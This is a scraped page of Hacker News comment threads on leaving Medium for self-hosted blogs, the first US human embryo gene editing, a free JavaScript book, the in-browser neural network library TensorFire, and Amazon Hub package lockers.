I prefer including links to Hacker News or Reddit in the blog post. I'm not interested in handling authentication, moderating users, or dealing with spam. News aggregators usually do a great job with all those points.

The Webmention [0] spec solves this problem, but sadly, it hasn't been widely adopted. :(

[0] https://en.wikipedia.org/wiki/Webmention

ngsayjoe 1 day ago 1 reply      
I recently wanted to move my Tumblr personal blog to Medium however after a few days of nightmare and still unable to setup a custom domain despite having paid $75 fee i requested a refund and closed my account. Their customer service and documentation kind of sucks!
bhalp1 1 day ago 0 replies      
At https://dev.to we have a similar product to Medium in a lot of ways. One thing we try to do is offer the benefits of Medium in terms of distribution, but also encourage users to easily make their own site the canonical source, because we don't want to force vendor lock in when you get to this point.

I'd like to think we also do a good job dealing with a lot of the UX issues that the author outlines :)

alanh 21 hours ago 0 replies      
Not to be a horrible self promoter (it's just the ideas I care about), but my 2012 discussion of the problem with new blogging platforms still applies, from a general perspective, to Medium: https://alanhogan.com/the-problem-with-new-blog-platforms. (tl;dr is that eventually you will grow out of virtually any non-Wordpress platform, especially one you dont control yourself.)
ewanm89 1 day ago 4 replies      
Why lose flexibility and switch to medium in the first place?
zabil 1 day ago 0 replies      
It's not easy to run a team (engineering) blog with static site generators.Authoring in markdown, reviewing, external contributions etc takes up a lot of time.

With medium we've encouraged the team to run personal blogs and add interested articles to the team publication. It's a bottom up approach.

In return, we get viewer-ship when medium recommends our articles on other (medium) blogs or via tags. Medium has a sense of community. Speaking strictly for myself, running your own site is tad selfish, it lacks as sense of community. Right now medium does that, We'd only move out of medium if there's something that does it better.

erikb 1 day ago 0 replies      
I find the first part particularly interesting. I always contemplated of whether or not I should start blogging. And for me it always seemed an obvious choice between whether or not I want to host my own blog, which would mean a lot of energy and money investment, or if I should start a medium page, possibly losing control over my texts and page views.

When you now say that it's a hassle to setup and even costs money, why should anybody use Medium? Do people not know how much you already gift a page if you let them host your content? They should pay you and not the other way around.

luord 1 day ago 0 replies      
I had no interest in using medium, but this is one extra little reason for not fixing my unbroken pelican+GitLab pages setup.
Goladus 1 day ago 1 reply      
Why remove all your posts from medium.com? Why not post to both wordpress and medium.com?
denisehilton 1 day ago 0 replies      
Does medium allow you to monetize your content and put ads? If it's not the case then why do people write for Medium. What's there to gain?
owens99 1 day ago 0 replies      
Medium is blocked in China. And there are as many people learning English in China as the entire US population.

That's the biggest deal breaker for me.

pgeorgep 1 day ago 0 replies      
Interesting read. Personally, I prefer Medium for the convenience.
xerophyte12932 1 day ago 0 replies      
Irony: I am getting a "This site can be reached".
skyisblue 1 day ago 0 replies      
One thing that really annoys me is embeded gists don't render in medium's mobile app.
maxraz 1 day ago 0 replies      
Setting up a domain was difficult. Really?
nvr219 1 day ago 0 replies      
Privacy Badger blocks most medium sites for me :)
abiox 1 day ago 0 replies      
i generally avoid medium.com blogs because the ui is bad. i hate the comments system.
tomerbd 1 day ago 1 reply      
may I ask which theme you use? it looks very nice..
crispytx 1 day ago 0 replies      
My blog is hosted by Medium on my own domain and I think it kicks ass. All of the issues the author brought up in his post seemed pretty minor to me. Just my opinion, but Medium has the best blogging software out there, by far.
tomerbd 1 day ago 0 replies      
i did some google search for

"gatsby themes""gatsby disqus"

almost nothing useful turns out.. any ideas?

First Human Embryos Edited in U.S technologyreview.com
442 points by astdb  5 days ago   276 comments top 35
plaidfuji 5 days ago 6 replies      
I've seen most of these arguments for and against gene editing before, but the fact of the matter is that it will come down to the economic competitiveness of nations, as always.

What concerns me in the long term is that gene editing will cause human genomes to converge to a single gold standard with proven mental and physical benefits, thereby reducing our species' genetic diversity and leaving us more vulnerable to a mass extinction event. A "zero day exploit" that everyone missed in the popular new cancer-fighting edit.

eggie 5 days ago 5 replies      
We would need a very particular set of conditions for embryonic editing to be justifiable under a medical dogma that aims to "do no harm." Both parents would need to carry a large common set of recessive deleterious alleles, as this would make embryonic selection of non-carriers very difficult. Then we would need the editing system to be so reliable as to not introduce off-target mutations. In a preimplantation setting, we can't easily observe if non-desired mutations have been introduced in some cells, as this would require sequencing every cell in the developing embryo. Serious disease introduced through chimeric errors in the editing process would be a real possibility, and there is no feasible way we could guard against this result using sequencing as it would require destruction of the embryo.

A more realistic scenario would be to develop a human embryonic stem cell culture that has been edited as desired and then implant this into a developing blastocyst at a point at which it would take over the and develop into the fetus. This is done with mice and there is no reason it wouldn't work for humans. I think that most people would find this much more abhorrent than directly editing the germline. However, it would be much safer for the engineered proband and would not require a "perfect" editing system that we do not have.

sethbannon 5 days ago 5 replies      
I am so insanely excited for the potential of this technology. There are many ethical questions here, but the potential benefits far outweigh the downsides. In the near future, we can detect and eliminate genetic disorders, ensuring no child has to suffer from these defects any longer. Long term, this gives us a tool to take control of our own evolution in a way never before possible.

Couldn't be more excited for what's possible.

kanzure 5 days ago 4 replies      
here's a TODO list i made for possibly interesting genome editing targets: http://diyhpl.us/wiki/genetic-modifications/

Many of these have low demonstrated correlation or significance so don't just blindly load everything on that document into your at-home CRISPR kit http://www.the-odin.com/gene-engineering-kits/ but it should be a good starting point for thinking about what can be modified, improved, disimproved, etc.

artur_makly 5 days ago 1 reply      
"Although none of the embryos were allowed to develop for more than a few daysand there was never any intention of implanting them into a womb"

oh im sure human trials have begun by the time mass articles like this surface.

i've met young gententic research students who told me they went to work for labs based in Latam simply because they were allowed to do perform any experiments deemed illegal in the US - to get a precious few years of a head start.

albertTJames 5 days ago 2 replies      
Ethics questions need to be raised now, and guidelines have to be decided. The future of humanity is in gene editing. It should not depends on the lazyness of law makers and outrage of godfearing creatures to decide the fate of humanity. It is time we take our evolution into our own hands.
dr_ 5 days ago 4 replies      
I realize that scientific consensus is that gene editing should not be permitted to enhance human performance - be it mental or physical. But if one nation ignores this consensus, and starts producing "super humans" wouldn't other nations be compelled to follow?Otherwise, over time, wouldn't their citizens, and their nation, slowly fall behind as a country of power and status?Just a thought.
WalterBright 5 days ago 5 replies      
Gene editing is probably the only way humans can colonize space. By adapting people to different gravities, air chemistry and pressure, radiation, etc., the need for life support equipment can be significantly reduced, and the quality of life of the colonists can be improved.
pcnonpc 5 days ago 2 replies      
"The BGI Cognitive Genomics Project is currently doing whole-genome sequencing of 1,000 very-high-IQ people around the world, hunting for sets of sets of IQ-predicting alleles. I know because I recently contributed my DNA to the project, not fully understanding the implications. These IQ gene-sets will be found eventuallybut will probably be used mostly in China, for China. Potentially, the results would allow all Chinese couples to maximize the intelligence of their offspring by selecting among their own fertilized eggs for the one or two that include the highest likelihood of the highest intelligence. Given the Mendelian genetic lottery, the kids produced by any one couple typically differ by 5 to 15 IQ points. So this method of "preimplantation embryo selection" might allow IQ within every Chinese family to increase by 5 to 15 IQ points per generation. After a couple of generations, it would be game over for Western global competitiveness."


What do you think about this? From what I gather, the Chinese and much of East Asia do not have cultural resistance against using genetic engineering to increase their children's IQs. I will even guess that the governments will encourage their populations to use it.

Will the US, in particular the educated portion of the population, will adopt the practice soon after it is proven safe?

If China starts to do that en masse, Europe and the US will likely criticize them initially. Will they then be forced to adopt the practice soon afterwards? If so, how many years of lag approximately? How much resistance will there be on adopting the practice especially considering the left's belief on everyone's fundamental equality?

The denial about the importance of intelligence is quite obvious now at least by a significant percentage of Americans and Europeans. (They claim "hard work and culture are what matter.", ignoring twins and adopt studies) Will they wait for 1-2 generations until it's so obvious they cannot compete when they start to use genetic engineering themselves?

roceasta 5 days ago 2 replies      
The talk is of 'genetic enhancement' but the potential benefit seems more boring and necessary to me: removal of many new and as-yet-unidentified mutations. It is thought that these have been accumulating generation by generation since about 1800 when child mortality started to fall.
thosakwe 5 days ago 3 replies      
In my class just Monday, we watched a film titled Gattaca, which tells the story of a society fueled by eugenics, where most births are in-vitro modified babies, and there is clear discrimination against those with "imperfect" genes. It's crazy how close these things are to reality.
Mikeb85 5 days ago 2 replies      
As if there wasn't enough inequality in the world, now the rich will be able to afford to make their offspring genetically superior to everyone else's. Have fun with a 1% that are literally overlords.
chiefalchemist 5 days ago 1 reply      
Wasn't there a HN post/thread a week or so ago about some scientist having a (new-ish) theory about DNA and the role specific genes play? If there's enough doubt that there's still room for other theories, is CRISPR really a good idea?
noir-york 5 days ago 1 reply      
Evolution made us, then we discovered it, and now we can directly code it.

Pity evolution didn't give us the intelligence, restraint and good judgement to make sure that we will not screw this up. And we will.

A myriad of reasons will be given. Medical reasons - how could one refuse? Then parents: "Harvard is expensive and I want to give my child the best chance I can afford". Then nation states will feel pressure to 'level the genetic playing field'.

On the other hand, with AI soon replacing us, apparently, we can fight back and enhance ourselves!

greendestiny_re 1 day ago 0 replies      
I'm eager to see the long-term results of the gene editing procedures.

>The earlier Chinese publications, although limited in scope, found CRISPR caused editing errors and that the desired DNA changes were taken up not by all the cells of an embryo, only some.

Instability is an inherent property of genes.

mmirate 5 days ago 1 reply      
Well this is exciting, but hopefully it will advance beyond "genetic disease". Or maybe in the future we will be able to expand our definition of that term, to include all genetic predispositions to suboptimal traits? (e.g. slow observation-decision loop, hedonism, sentimentalism/too-much-empathy, neuroticism, etc.)

Either way - hopefully, when this tech is completed, we will be able to accept and enjoy that our descendants will literally be superior beings to us, and not look upon them with too much envy.

djohnston 4 days ago 0 replies      
We already have a clear division in health along socioeconomic lines, but delivberately encoding our inequalities into our DNA is a future I could skip.
Noos 3 days ago 0 replies      
I don't think the modest raise in IQ would be worth a society that considers children as products they can alter to specification. Bill McKibben in Enough wrote eloquently about the existential dread that could happen if we somehow managed to select for musical skill for example. It's one thing to deal with your talent or lack of it in terms of the randomness of normal life, another thing to realize you are little more than a racehorse that has been bred because your parents want you to be something.
patkai 3 days ago 0 replies      
I know very little about this topic, but let me shoot: isn't this method for improving competitiveness misguided and shortsighted? How about working on emotional intelligence, better education and talent management, better food in schools, better child care, more support for disadvantaged families - there is so much we can do... Or is it just not about improving society, but individuals (with deep pockets)?
nonbel 5 days ago 1 reply      
Yet another mainstream news report on CRISPR before any scientific report is available.
k__ 5 days ago 1 reply      
Sounds nice, but I don't want children, I want myself to be improved.
stillhere 4 days ago 0 replies      
Seems like a more socially acceptable form of Eugenics since society seems to value advanced science more than it does traditional mate selection based on desired physical traits.
idibidiart 4 days ago 0 replies      
Evolutionary logic is like a massive legacy codebase without any tests. Fuck with it at your own risk. You could definitely get lucky and improve functionality but you'll never know what you'll be breaking.
gehwartzen 5 days ago 1 reply      
"Now Mitalipov is believed to have broken new ground both in the number of embryos experimented upon and by demonstrating that it is possible to safely and efficiently correct defective genes that cause inherited diseases."

Seems a little early for such a claim based on embryos that only developed for a few days.

vivekd 4 days ago 0 replies      
I think enough people recognize the ethical issues inherent in designer babies enough that we are in no danger of reaching that point. I think the tech could have great applications in livestock and curing genetic defects.
ysleepy 5 days ago 1 reply      
Why do in on human embryos instead of any other animal?At this stage, it must be for publicity reasons alone. Tasteless in my view.
analog31 5 days ago 0 replies      
In the future, every dissertation will include in its Acknowledgements section, the student's parents, faculty advisor, and gene editor.
jlebrech 5 days ago 0 replies      
Reactivate Vitamin C synthesis, etc.
ziikutv 5 days ago 0 replies      
Wow it's a Brave new world.
cellis 5 days ago 3 replies      
CRISPR is coming. I seriously think with CRISPR we could see several trillion dollar companies. From cancer and aids cures to fundamentally altering what it means to be human, this is all within the near grasp of CRISPR ( if what i've been reading is to be believed ).
theRhino 5 days ago 0 replies      
question is did they use emacs or vim?
thrwaway655366 5 days ago 0 replies      
SiempreZeus 4 days ago 0 replies      
You want a Gattaca world?? This is how you get a Gattaca world.
aphextron 5 days ago 0 replies      
Cozumel 5 days ago 2 replies      
Related: 'Unexpected mutations after CRISPRCas9 editing in vivo' http://www.nature.com/nmeth/journal/v14/n6/full/nmeth.4293.h...
Show HN: The JavaScript Way, a book for learning modern JavaScript from scratch github.com
543 points by bpesquet  4 days ago   108 comments top 16
bpesquet 4 days ago 8 replies      
Hi all, author here.

Backstory: I'm a CS engineer/teacher and this book is a side project started in December 2016. You can read a bit more about it here: https://medium.com/@bpesquet/walk-this-javascript-way-e9c45a....

The writing process is now completed and I'm actively looking for feedback to make the book better. Any opinion or advice about content, pricing, or that hastily created Leanpub cover would be greatly appreciated. However, please keep in mind that this is a self-published effort still far from being polished and open to improvement.

I'd also like this thread to stay focused on the book itself, not on the merits/weaknesses of JavaScript or the usefulness of choosing it as a first programming language.

Thanks in advance!

ryanmarsh 4 days ago 11 replies      
I just got home from teaching JavaScript to a room full of people who've never written a line of code in their life.

This book is missing something critical that most intros to JavaScript overlook:

How does the student set up the plumbing and run their code?

It's amazing how much of a hump this is for many trying to get started. It also amazes me how oblivious most of us programmers are to it.

"Just open Chrome Dev Tools" or "put this in a file and run Node" are really strange computer tasks to someone who has never typed and executed code.

sAbakumoff 4 days ago 1 reply      
I think that the best book ever about JS for everyone, especially for those starting from scratch is https://github.com/getify/You-Dont-Know-JSyou simply don't need anything else
le-mark 4 days ago 1 reply      
Very, very nice. I briefly went over some chapters and I especially admire the 'no framework' approach you've taken. I believe there's a real need for a book like this, kudos to you for making it happen! What inspired you to create this?
internalfx 4 days ago 2 replies      
Another great JS book on github...


eksemplar 4 days ago 0 replies      
If you ask me all that you need to know about modern JavaScript is that it exists mainly to sell online learning material.

But I may be a bitter old man and your resource looks pretty good.

ThomPete 4 days ago 1 reply      
This is great!

I am fairly familiar with programming having done both AS, Lingo and PHP I understand code when I see it. I am however not a programmer but more a technically oriented product designer and so I don't get to practice as often.

I have been trying to get into javascript and while I understand all the fundamentals it's still not something that I feel comfortable doing which is a shame as it's kind of the language of the internet.

Skimming through this books it looks like the perfect way for me to spend my next two weeks of vacation so thank you so much.

Is there a way to to donate to you?

Having made something as comprehensive as this you need to think about how to break it up so that you keep users engaged and so that you cam maximise your revenue. Selling books is mostly a spike and then long slow ramp towards halt so make sure you keep your content alive.

If I may come with two suggestions.

1. Make a forum for your readers perhaps in the form of an online reading group so that you have someone to go through the book with.

2. Make a step by step email course where you go through the book and have people turn in assignments perhaps even in forums.

3. Let people hire you as a private teacher perhaps build up . a network of private teachers. (Ok that was three suggestions)

These I think would be great ways to monetize.

dotnetkow 4 days ago 0 replies      
Saw this on Reddit last night, poked around on a few pages. It's great! Love the movie list example on this page: https://github.com/bpesquet/thejsway/blob/master/manuscript/.... Going from "for" loops into map/filter/reduce concepts is an excellent way to teach!
partycoder 4 days ago 0 replies      
What all these tutorials omit is the tradeoffs JavaScript and node incur in order to be simple and friendly.

- In JavaScript: no type annotations, numbers are floating point numbers, garbage collected, no multi-threading in the language spec. There are some ways to workaround these limitations, but they're not a part of the language.

- The concurrency model of node, based on libuv event loop. This dictates what node is good for and what is not good for. Short lived tasks = good. Long lived tasks = bad (service degradation + cascading failures bad)

leke 4 days ago 0 replies      
I love the tl;dr section. It's basically what I have do when reading books, in order to recall the essential information without having to read the entire chapter again. Well played.
oblib 2 days ago 0 replies      
I went over a few chapters this afternoon and really enjoyed what you've put together. I'll definitely recommend it to friends who ask me about learning to code.
jchien17 4 days ago 3 replies      
Should one learn ES2015 before learning ES5? Is there any value or need to learn ES5 if you're not maintaining an old codebase?
scottmf 4 days ago 2 replies      
Looks great. I love modern JS, and the faster everyone can move on, the better!

I didn't see any async/await stuff though, is there a reason for that? I'd imagine it would make some code much easier to follow.

noir_lord 4 days ago 0 replies      
This is incredible.

GF wants to learn to program, she has a strong math/finance background and I think she'd be good at programming but the web can be a bit overwhelming in totality.

baalimago 4 days ago 1 reply      
Didn't know "var" was outdated. Good stuff, thanks!
minademian 4 days ago 0 replies      
this looks promising. I like how it teaches the concepts using plain Javascript without focusing on a tool or library. Kudos.
Show HN: TensorFire tenso.rs
500 points by antimatter15  20 hours ago   76 comments top 39
antimatter15 19 hours ago 6 replies      
Hey HN!

We're really excited to finally share this with you all! This is the first of a series of demos that we're working to release this week, and we're hoping you'll keep us to that promise :)

Sorry if it doesn't work on your computer! There's still a few glitches and browser compatibility problems that we need to iron out, and we're collecting some telemetry data with LogRocket (https://logrocket.com/) to help us do so (so you all know what kind of data is being collected).

We'll open source the library under an MIT license once we finish writing up the API docs, and fixing these bugs.

danicgross 18 hours ago 1 reply      
TensorFire was a finalist of AI Grant. Applications for the next batch are open now! Get $2,500 to work on your AI project: https://aigrant.org.

It should only take five minutes or so to apply.

zitterbewegung 19 hours ago 1 reply      
Really cool demo. How does this compare to https://github.com/transcranial/keras-js ? Do the authors have a licence in mind?
mholt 18 hours ago 1 reply      
This is amazing. I can't use GPU Tensorflow (natively) on my Macbook Pro because it doesn't have an NVIDIA graphics card. But I can... in the browser! Honestly didn't see that one coming.
smaili 18 hours ago 0 replies      
Well done! Also important to note this project is one of the 10 recipients of the Spring 2017 AI Grants[1].

[1] https://aigrant.org/#finalists

motoboi 19 hours ago 2 replies      
Could someone explains whats is going on here? What are the steps? Why those colorful artifacts appear before the final result?
rjeli 13 hours ago 0 replies      
Really cool - just want to point out that the flashing rectangles might trigger epilepsy. I'm not sure if they're intended, but on Chrome on Linux I get a bunch of 1 frame brightly colored rectangles flashing before the result. Might want to disable that or put a warning to avoid an accident.

That said, well done, very impressive project!

nametube 19 hours ago 1 reply      
"running networks in the browser with TensorFire can be faster than running it natively with TensorFlow."

could you elaborate on this statement ?. What kinds of architectures does this hold true for ?.

caio1982 19 hours ago 0 replies      
Kudos for providing a minimum experience on mobile! I was afraid I would have to wait until I got home :-)
martinmusio7 6 hours ago 0 replies      
Whenever I click on an image in the lower left corner it compiles the kittens. This shouldn't be like this, right? The NN is supposed to take example I'm choosing. (?)

And, as everyone else mentioned already: f*ing wow!

hughes 16 hours ago 2 replies      
Hmm, this seems to lock up & crash my whole browser (Chrome 59, windows, nvidia graphics) when I try to run any of the examples. It gets past Downloading Network, then gets about 5% through Compiling before getting stuck.
hackpert 8 hours ago 0 replies      
Inference speed looks brilliant. Eager to read the source!

(Also, somehow I had a feeling before even reading that this project was by the people who made Project Naptha etc. Have you written/talked about this anywhere earlier?)

fabian2k 18 hours ago 1 reply      
I've played around with doing some computation in WebGL, but it was rather tedious and difficult with my limited knowledge about the topic. It's possible, but you can't even rely on floating point texture to be available on all systems, especially mobile. And for anything more complicated, you probably need to be able to render to floating point textures, which is even more rare than support for plain floating point textures.

This only makes it more impressive when people do cool computational stuff in WebGL, but I'd wish there were some easier ways for non-experts in shader programming to do some calculations in WebGL.

realworlddl 8 hours ago 0 replies      
Nice demo! I made a shop where you can buy images like these (www.deepartistry.com). Would be happy to see more designs coming in.
dizzy3gg 7 hours ago 0 replies      
So I could build a model using the Google Detection API then do the actual inference within the browser?
tambourine_man 16 hours ago 2 replies      
Didn't work here, just a bunch of colored squares on Safari, Chrome or Firefox. The latter actually managed to hang my machine. I could ssh to it but kill -9 wouldn't terminate Firefox.Had to force reboot the machine, haven't done that in years.

Amazing and scary, this WebGL thing is.

iMac 2011, latest OS

Edit: worked on MacBookAir

Dowwie 13 hours ago 0 replies      
It is with great pleasure that I may present to you, Denali:


sonofaragorn 18 hours ago 0 replies      
This is really cool! Great work!

I wanted to download the resulting image but got a "Failed - Network" error :(

fletchowns 16 hours ago 1 reply      
I get an SSL error SEC_ERROR_UNKNOWN_ISSUER when I try to load this page. I tried removing https from the URL but then it's blocked by OpenDNS with message "This domain is blocked due to a security threat"
batmansmk 18 hours ago 0 replies      
This is awesome!

Quick question: is the code compiled from js to webgl in browser as well, or do I need to compile beforehand?

I see this as a great way to learn and teach AI without having to bring a large toolchain.

Edit : it seems it is just a runtime for now for Tensorflow models!

uyoakaoma 18 hours ago 0 replies      
Failed when I uploaded an image

>> framebuffer configuration not supported, status = undefined

iXce 18 hours ago 1 reply      
> as fast as CPU TensorFlow on a desktop

> You can learn more about TensorFire and what makes it fast (spoiler: WebGL)

Does this mean that using a GPU in a browser through WebGL yields the same speed than a desktop CPU?

jstsch 19 hours ago 0 replies      
Seriously cool. Great work. I did get a glitch every now and then in the rendered output (say 1 out of 5 times) using Safari 10.1.2, MBP touchbar 2016 15", Radeon Pro 460 4096 MB.
shams93 12 hours ago 0 replies      
This would be an interesting way to generate a self-updating blog or an automated news site.
arnioxux 19 hours ago 1 reply      
Is the end goal to allow people to donate computing power for training? (a la Folding@home or SETI@home except just by visiting a webpage)

If so that's amazingly clever!

narrator 19 hours ago 1 reply      
I guess WebGL is now the "good enough" cross-platform vendor neutral replacement for CUDA.

Tensorflow should add a WebGL backend that runs in NodeJS.

cpcarey 17 hours ago 0 replies      
Amazing work! That was incredibly fast (2013 MBA 13" 1.7 GHz i7, Intel HD Graphics 5000 1536 MB, Chrome 59).
udia 16 hours ago 0 replies      
Lots of potential here. Looking forward to seeing the source once it's released.
jacquesm 16 hours ago 0 replies      
Awesome demo. Happy to report it works without a hitch on Firefox/Ubuntu.
fulafel 19 hours ago 0 replies      
Very nice to see webgl gpgpu apps, they have been slow in coming. Any plans for webgl 2?
ruste 17 hours ago 0 replies      
Nice, Leonid Afremov is a great choice of input art.
aluhut 17 hours ago 0 replies      
Respect. This pretty much killed the PC I'm on now. Wasn't even able to get to the task manager :D

Windows7, Firefox 54(64bit)

ccheever 17 hours ago 0 replies      
This is amazing. Very cool.
draaglom 19 hours ago 0 replies      
This is really cool!!
gilbertstein 8 hours ago 0 replies      
is there a way to download and play with it?
cs702 19 hours ago 1 reply      
Where is the repo?
setgree 17 hours ago 0 replies      
I love it
zo1 18 hours ago 1 reply      
>"Could not initialize WebGL, try another browser".

Happening in both Firefox and Chrome on Ubuntu. What exactly am I missing here?

synt 13 hours ago 1 reply      
hey, stop it.

i'm running 55.0b13 (64-bit) firefox on windows 10 and clicking on that demo froze the browser, froze my box - hard reboot.

whatever you're doing some of it's wrong. bad wrong.

Amazon Hub amazon.com
431 points by danial  4 days ago   331 comments top 60
Balgair 4 days ago 16 replies      
Oh wow, I guess the company at my old Apt complex got bought out. Those racks are the exact same.

Still, those were terrible ideas. FedEx, USPS, and UPS all just dropped the boxes off on our door. The others made us use those machines. It wasn't too bad to go down and get the packages. Oh wait, then you forgot your phone and had to go all the way back up to get it to get the unlock codes off of your email. Then you had to be certain that your email would not send the code email into spam, so that sucked.

But if you were out of town or on vacation or just stressed from work or had a spam email mis-identification then it was a spawn worse than Satan. The system started to charge you, like 5$/day or something, for non-picked-up packages after like day 3. Guess who got a nasty surcharge after spending a month away for work and no email to tell me that things would get surcharged? Yeah, 150$ for some random thing my sister sent me unannounced was not a lot of fun.

And no, the apt complex signed onto this AFTER we moved in and with no notice on the lease or an update to us. I did get the complex to pay that crazy fee after storming in one morning and yelling a lot. Idiots.

As long as there is no charge for packages that don't get picked up and no 'max time' it can sit in a robo-bin, these things work great. If there is any charge at all, in any way whatsoever, avoid them like the plague, they are horrible.

nihonde 4 days ago 3 replies      
As is so often the case, this is already a solved problem in Japan. When a package arrives, I'm alerted to its presence when I RFID my key to open the lobby door. Then I RFID my key again on the package locker and the locker with my stuff pops open.

The issue with lockers filling up too quickly or packages sitting in them too long is handled by the shipping company, which has sufficiently good customer service to contact me about re-delivering items that aren't reaching me. Also, my neighbors would be mortified if their deliveries ever inconvenienced someone else in the building, so it's somewhat self-policing in that sense.

The amount of over-engineering that goes into overcoming the shortcomings of customer service and lack of basic etiquette in America is amusing and sad. Amazon seems to be an emerging leader in finding solutions for social breakdowns that could be easily solved if people cared more about doing a good job or about extending basic courtesies to their fellow citizens.

veridies 4 days ago 7 replies      
This morning, an Amazon deliveryman walked a few steps toward my house, threw a package about fifteen feet to the door (denting the case inside), and then walked back to his van. I still can't find a specific way to complain about the delivery. Forgive me if I'm not excited about Amazon building their own private mailboxes, but I don't think they have any real understanding of their own shortcomings.
cbhl 4 days ago 3 replies      
The biggest problem with this is that packages are bursty -- your mail room is always bursting around Christmas time.

I saw one apartment complex this year that had a twist on the package robot concept -- there's an iPad at the door of the mail room, and you type in the code from your package, the iPad takes your photo and then unlocks the mail room door using a solenoid.

The UPS guy? Scans the barcodes on the packages, then wheels them in and drops them off on cheap metal shelves inside -- no need to pay an employee to manage the mail room 24/7. More residents/packages? Just buy a few more shelves. Resident wants to pick up a package as soon as Amazon buzzes them? No problem. Resident wants to pick up at 2am? Great.

The only problem is you have to trust your neighbors to not steal your packages.

ohyes 4 days ago 0 replies      
I had something like this at an apartment I lived in, it was called 'package concierge.'

It was mostly nice, but where I lived there were issues with execution of the idea. At peak times (holidays) the package robot would get full, because people wouldn't pick up their stuff in a timely manner.

The package robot also had to be loaded by an employee of the building... until then the package hung out in the mail room like normal, but you could only get your package from the package robot... so if the package showed up and no one was around to load the robot, or was slacking off on loading the robot, it actually took longer to get your stuff.

When it worked, however, it was good to be able to pick up your package when you got home from work at midnight without having to talk to anyone or sign anything. Also getting notified via email that you had something waiting was nice.

polskibus 4 days ago 6 replies      
Been using InPost Paczkomaty for ages.https://twoj.inpost.pl/pl/przesylki/paczkomaty

established 2006, helped bring down the cost of deliveries at the same time improved convenience of online shopping when DHL,etc. always wanted to come to your flat when you were at work

netinstructions 4 days ago 5 replies      
Was kind of hoping this is something individual home owners could install near the front door so packages aren't left on the steps.

If you fill out the form it asks what kind of property you have, and single family homes is an option, but then it says "your property does not meet our requirements at this time." I wonder if enough people select that though...

clvcooke 4 days ago 4 replies      
Looks like Amazon picked up the buffer box [1] idea. Such a shame Google bought them and shut them down, it had such potential.

[1] https://en.wikipedia.org/wiki/BufferBox

bastijn 4 days ago 1 reply      
In NL you can deliver your package to a drop off point near your house. Usually these are supermarkets or other kind of shops. I always pick my local supermarket which is anyway on my way home. It is open until 22.00 on working days so no issues there.

It is not like this Amazon box but it does also not have the other things to worry about (packages arriving on holidays and costs surcharged thereafter). The shops get a little extra earnings and they handle sending back etc. When not picked up. The service is free of charge for customers.

I guess Amazon box would be a tad more convenient to go to as they are at your doorstep (every single house is their intention, didn't get the site really?) but to be honest, you are visiting your supermarkets anyway. At least in NL where they are close. US might be a bit different here due to distance? Though you can do other shops as well, and usually there is one within say 1-2km.

sumitgt 4 days ago 8 replies      
My apartment uses LuxerOne (https://app.luxerone.com), and it is the best amenity IMO.

One problem of Amazon Hub v/s LuxerOne is that I don't think Amazon Hub will work with packages from other retailers.

rtpg 4 days ago 4 replies      
I get that the post office as a whole is useful, but on an organizational level it probably would make more sense for everyone to have to go to the post office to pick up their deliveries in this day and age.

Personal deliveries to your doorstep is a pretty luxurious service, if you think about it in abstract. Plus it seems inefficient for these delivery people to go to a bunch of people's houses and drop things off (when people are mostly not home) when we could all just change our daily commutes slightly when we need to.

crashedsnow 4 days ago 0 replies      
We have a security gate and I installed a network-enabled lock for which I can remotely add temporary security codes that we then specify in the order from Amazon. This results in the UPS guy completely ignoring it and leaving the package outside the gate in plain view for package thieves. Delivery drivers are like cab drivers used to be before Uber/lyft. There's no accountability baked into the process. Someone please invent Lyft for deliveries.
creo 4 days ago 1 reply      
We have that in Europe for years. It works great for me. There is no communication struggle with anyone nor planning involved and its cheaper. You'll get phone message and mail that there is package to take and from that moment you have 48 hours to pick it up. If you don't do it within time limit, package gets back into warehouse so you can go there or request home delivery for few euros.
quantumwannabe 4 days ago 0 replies      
This just looks to be Amazon Locker[1] for apartment buildings. I've seen the lockers in hotels and around town for several years.

[1] https://www.amazon.com/b?node=6442600011

dcw303 4 days ago 1 reply      
My apartment in Tokyo has a similar system, and the apartment before that. I'd guess that most modern buildings within the 23 wards have it too. Don't know about other cities. You use the same electronic key that you need to get into the building foyer.

All domestic delivery companies (Kuro Neko, Sagawa, etc) will drop into them without a second thought. FedEx are a bit more annoying that you have to call ahead and authorize them to use a bin, but that's ok.

I only have trouble with some things through Japan Post where a signature or ID is required, which is annoying but understandable when they are delivering something like a credit card.

Nition 4 days ago 1 reply      
"You can pick up any package" says the video while showing a whole sequence of packages of roughly the same dimensions.
revelation 4 days ago 1 reply      
Looks like a Packstation:


They are nice, but it's a bit of a trade-off: 50% chance there is an empty opening in the station, 50% chance it's full and they dump the packet at some service center miles away where you stand in line for half an hour and get your package late.

smpetrey 4 days ago 0 replies      
As a person who regularly commutes from Brooklyn to Manhattan for work I'm never home to accept my Amazon deliveries. To make matters worse, the local UPS, FedEx and USPS offices always "lose" my package only to have either never show up or it is re-delivered weeks later with no notification.

Why don't they just leave it in vestibule or on my doorstep? Thieves. All delivery carriers just plain refuse to leave packages unattended.

This solution is basically an Amazon locker or PO Box that lives in my lobby? Sounds awesome. Amazon Hub might not make sense in rural areas but Amazon's biggest target lives in urban areas. I'm so ready for this.

alecco 4 days ago 1 reply      
This model doesn't work already.

I ordered some PC parts to an Amazon Locker and got my Amazon account suspended indefinitely. I can't log in to it. But they didn't block the other half of the order that didn't make any sense to get (a case).

They asked my ccard billings via fax (shrug). After struggling with my hotel's terrible computer and fax I managed to send it to them. No answer. I asked and only then they responded in a short email it was not legible. Terrible support.

Also the delivery of the case was delayed several days so I lost it but had to pay for it anyway.

They managed to make me never buy from Amazon again. My account was over 10 years old. Had problems with deliveries a year ago, too. (that was why this time I tried an Amazon Locker)

primigenus 4 days ago 1 reply      
Hopefully at some point in the future apartments/houses just come with privileged access entryways that you can manage, and delegate time-gated access to delivery services. That way the delivery person can just let themselves into your "airlock", put the package there, and leave without getting undue access to your private home and without it being a public space (like a porch) that requires a social contract to not be broken in order to remain secure.

Today's too early though, since IoT (eg. a connected doorlock) seems untrustworthy. What are some solutions that could be used to approximate it, I wonder?

wanghq 4 days ago 0 replies      
Lesson learned: if you have some idea, buy a domain name, and have one static page to explain the idea, and use a form service to collect feedback :)

It's interesting to see that amazon doesn't mind using a 3rd party form service to collect information (https://amazon29.au1.qualtrics.com/jfe/form/SV_8nWssUBen1xjL...) even though they have enough tech power to do that.

erickhill 4 days ago 0 replies      
I wish my office's building was able to support one of these. Our neighborhood USPS will often swing by after the office doors lock. They will say things like "unable to deliver" but never deliver during office hours. When you buy from Amazon, you never know if UPS (never a problem) or USPS is going to be the deliverer. It makes Prime shipping nearly worthless for many of us.

But we don't own this building, and at least right now I can't imagine where one of these things might go.

